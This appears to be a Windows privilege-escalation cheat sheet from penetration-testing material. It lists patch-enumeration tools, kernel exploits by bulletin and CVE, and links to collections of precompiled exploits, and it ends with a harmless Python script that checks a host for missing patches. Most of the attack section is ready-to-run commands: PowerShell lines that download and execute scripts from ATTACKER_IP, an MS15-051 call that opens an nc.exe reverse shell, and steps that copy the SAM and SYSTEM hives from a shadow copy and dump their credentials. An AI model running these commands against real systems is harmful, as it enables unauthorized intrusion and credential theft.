Methodology

systeminfo → compare patches → find missing KB → search exploit → compile/download → execute

Windows Exploit Suggester

git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update
Save systeminfo output from victim:
systeminfo > systeminfo.txt
Run:
python3 wes.py systeminfo.txt
Filter critical only:
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

Watson (.NET — Run on Target)

Watson.exe
Identifies missing KBs and suggests exploits. Requires .NET 4.5+.

Sherlock (PowerShell — Deprecated but Works)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Sherlock.ps1'); Find-AllVulns

Check Installed Patches

wmic qfe
Get-HotFix | Sort-Object InstalledOn -Descending
Compare against known exploit KBs.

Common Kernel Exploits

MS16-032 — Secondary Logon (Windows 7/8/10, Server 2008/2012)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/MS16-032.ps1'); Invoke-MS16032
Missing KB: KB3139914

MS15-051 — Win32k (Windows 7, Server 2008)

ms15-051.exe whoami
ms15-051.exe "cmd /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Missing KB: KB3045171

MS14-058 — TrackPopupMenu (Windows 7, Server 2008)

ms14-058.exe
Missing KB: KB3000061

CVE-2021-1675 / CVE-2021-34527 — PrintNightmare

See dedicated PrintNightmare page.

CVE-2021-36934 — HiveNightmare / SeriousSAM

SAM/SYSTEM hives are readable by non-admins because of an over-permissive ACL; the live files are locked, so they are read from a Volume Shadow Copy. Check:
icacls C:\Windows\System32\config\SAM
If BUILTIN\Users has read access:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
Extract:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

CVE-2023-28252 — CLFS Driver

Affects Windows 10/11 and Server 2022; elevation of privilege via the CLFS kernel driver.
# Check
https://github.com/fortra/CVE-2023-28252

Pre-compiled Exploits

# SecWiki collection
https://github.com/SecWiki/windows-kernel-exploits

# Precompiled binaries
https://github.com/abatchy17/WindowsExploits

Quick Reference

| CVE | KB | Affected | Year |
|---|---|---|---|
| MS08-067 | KB958644 | XP, Server 2003 | 2008 |
| MS14-058 | KB3000061 | 7, Server 2008 | 2014 |
| MS15-051 | KB3045171 | 7, Server 2008 | 2015 |
| MS16-032 | KB3139914 | 7/8/10, Server 2008/2012 | 2016 |
| CVE-2021-1675 | KB5003690 | 10/11, Server 2016-2022 | 2021 |
| CVE-2021-36934 | KB5004945 | 10 (1809+) | 2021 |
| CVE-2023-28252 | KB5025221 | 10/11, Server 2022 | 2023 |
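The "compare patches → find missing KB" step of the methodology, done by hand against the Quick Reference table, as an added example that is not part of the original page or of wesng: it parses a saved systeminfo.txt, keeps only the table entries whose affected products match the OS name, and reports the KBs that are absent. The KB lookup is taken from the table above; the systeminfo output is constructed.

```python
import re

# Lookup constructed from the Quick Reference table on this page:
# (bulletin/CVE, fixing KB, product-name substrings the KB applies to).
# "Server 2016-2022" in the table is expanded to the three releases in that range.
KNOWN_KBS = [
    ("MS08-067", "KB958644", ("Windows XP", "Server 2003")),
    ("MS14-058", "KB3000061", ("Windows 7", "Server 2008")),
    ("MS15-051", "KB3045171", ("Windows 7", "Server 2008")),
    ("MS16-032", "KB3139914", ("Windows 7", "Windows 8", "Windows 10",
                               "Server 2008", "Server 2012")),
    ("CVE-2021-1675", "KB5003690", ("Windows 10", "Windows 11",
                                    "Server 2016", "Server 2019", "Server 2022")),
    ("CVE-2021-36934", "KB5004945", ("Windows 10",)),
    ("CVE-2023-28252", "KB5025221", ("Windows 10", "Windows 11", "Server 2022")),
]

# systeminfo lists hotfixes as "[01]: KB5003690", one per line.
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
OS_NAME_RE = re.compile(r"^OS Name:\s*(.+?)\s*$", re.MULTILINE)


def parse_systeminfo(text):
    """Return (os_name, installed_kbs) from saved `systeminfo` output."""
    m = OS_NAME_RE.search(text)
    os_name = m.group(1) if m else ""
    installed = {kb.upper() for kb in HOTFIX_RE.findall(text)}
    return os_name, installed


def missing_patches(text):
    """KBs from the table that apply to this OS and are not installed.
    A hit means 'verify', not 'vulnerable': a later cumulative update
    supersedes the listed KB without that KB appearing in systeminfo."""
    os_name, installed = parse_systeminfo(text)
    return [(cve, kb) for cve, kb, products in KNOWN_KBS
            if any(p in os_name for p in products) and kb not in installed]


# Constructed sample: a Windows 10 1809 host reporting three hotfixes.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4601050
                           [02]: KB5003690
                           [03]: KB5025221
"""
```

On the sample the check flags MS16-032 and CVE-2021-36934; the first is a false positive on a 1809 build, which is exactly the supersession caveat the docstring describes, so confirm hits against the build number before relying on them.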